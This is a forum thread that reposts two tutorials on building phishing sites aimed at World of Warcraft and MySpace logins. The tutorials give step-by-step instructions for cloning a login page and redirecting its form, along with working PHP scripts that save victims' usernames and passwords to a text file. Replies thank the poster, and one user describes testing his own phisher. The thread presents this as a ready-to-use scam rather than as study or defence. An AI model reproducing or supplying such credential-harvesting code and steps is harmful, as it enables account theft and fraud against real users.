2 Guides in one! How to make your Own Phishing site!!

[Saaen]

I saw these nice guides on hackforums.net and decided to post them to share! (doubt anyone else would) Anyway.... Ever wanted a phishing site made by you? Whether it's WoW (that's why it's in wow scams" or some other thing (myspace).

Well after I got a couple requests from people in my scam help thread, I went to find them. Anyway.... (again) These aren't mine, I will be giving credit to the person on hackforums who posted them, but I will change a couple words in the guide to fit for wow. There are two guides I'm about to list, ones somewhat easy to follow and ones not, choose the one you like!


Guide one!

1. First things first you must choose the site which you wanna make a phisher from.

2. When you found your site right click on it and say "view source" and save it on desktop as index.htm

3. Open the "index.htm" with notepad and find search the source for the word "action". you should find a command looking like this
<form action="RANDOM URL" method="post" autocomplete="off">
or anything alike.

4. change the url (in this case "RANDOM URL") to "next.php"

5. Save index.htm

6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of [Only registered and activated users can see links. ]. Create a free website.

7. login to your website and go to "file manager"

8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)

9. Create a new file called next.php and copy / paste this:

Code:

<?php
header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: [Only registered and activated users can see links. ] ");

11. Save this file (next.php)

12. Create a new file called "pass.txt". dont write anything in it. just save it empty. Your done making your phising site!

13. test out your website. type in something in your phisher and then go to filemanager and open "pass.txt" what you wrote should be typed here!

14. if its not typed there you should try editing "next.php" and enter this instead:

Code:

<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

think you know what to do with the "RANDOM" url.

NOTE: IF YOU USE THE SECOND CODE, YOU MUST SAVE THE TXT. FILE "password.txt" instead of "pass.txt"

Credits to Mathias of Hackforums.net

Well, onto guide two!

Guide Two (This one is not step by step)

All you need is a web hosting service with PHP enabled.
We will use t35. Go to [Only registered and activated users can see links. ] and sign up for a free account. In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his picture. That will lead you to Myspace's login page that has the red box with"You Must Be Logged-In to do That!" just above your login form. Now, click File>Save Page As, and save the myspace page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File' and paste the Myspace's source code there. Name the file 'login.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be 'www.xxx.t35.com/login.php' - where 'xxx' is the name of your account.
But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.
Open your 'login.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in button, search button, etc.). We need to find the 'action=some link' that refers to the Login button.
After some searching, we find the:

Code:

<h5 class="heading">
            Member Login
        </h5>
        <form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUwY3RsMDAkT WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWNrYm94BTBjdGwwMCRNYWluJFNwbGFza ERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24=" />
</div>

(The myspace part is there b/c this perosn used a myspace source code, a WoW one will be different)

and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"' refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="phish.php"
and save the file.

Formerly, when you click the login button it would take the values in the username and password boxes, and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'phish.php' file on your site(which doesn't exist yet).
All we have to do now, is to create a 'phish.php' file that contains a function that writes down the username and password into a text document.
Make another file named 'phish.php'(without the quotes) and paste the following code in it:

Code:

?php
header ('Location: http:/websiteyouwanttomakeaphisherfor.com ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

The function of phish.php is simple. It opens a file named 'passwords.txt'(and creates it if it doesn't already exist) and enter the information there(the username and password).
Congratulations! You have a phisher!Superman
The link to your phish site is:
[Only registered and activated users can see links. ] -where 'xxx' is your account name.
The link to your text file is:
[Only registered and activated users can see links. ]
Or you may access it from your account.

Note that you can choose whatever names you like for login.php, phish.php and passwords.txt. but the .php and .txt must stay the same.

Credits (mostly) Crow of hackforunms.net

Well, that's all that's needed since everybody knows how they are spread! Good luck with your own phisher (whatever it is about)

[ShadeRat]

pass.txt is growing bigger when i type in info, but i cant view what i typed. Going to see if password.txt is any better

[creesy]

thanks mate good guide if i could rep i would

[Saaen]

You can rep me, unless you need to spread :P. (not asking, just saying that he has the option too)

[JohnPreston]

Saaen, now I'm in your topic for a change lol.

X2 EDIT (after I spread it...)

[[Royal]]

Its a good guide and thanks for sharing, I'm not going to rep because you didn't make it, but thanks A TON for posting this here for others.

[XatoA]

Wow great guide, if i wasnt a leecher id +rep u

[Tanax]

Hmm.. not to sound negative or anything.. but the phishers created with these scripts are, sorry to say, not even worth having. The phishers script will be so bad, so that noone will fall for it. And if someone would actually fall for it, they will be so noobie that the account isn't worth having.

Why? Cause the script doesn't really run ANY checks on for example required fields. If a field is a number, then it doesn't check that. It doesn't have any errorchecking whatsoever.

I'd say; Learn some PHP instead of trying this out. Sure, this could be a good start, but I would suggest you to actually learn the PHP language, before trying to create phisher scripts.
Just my 2 cents.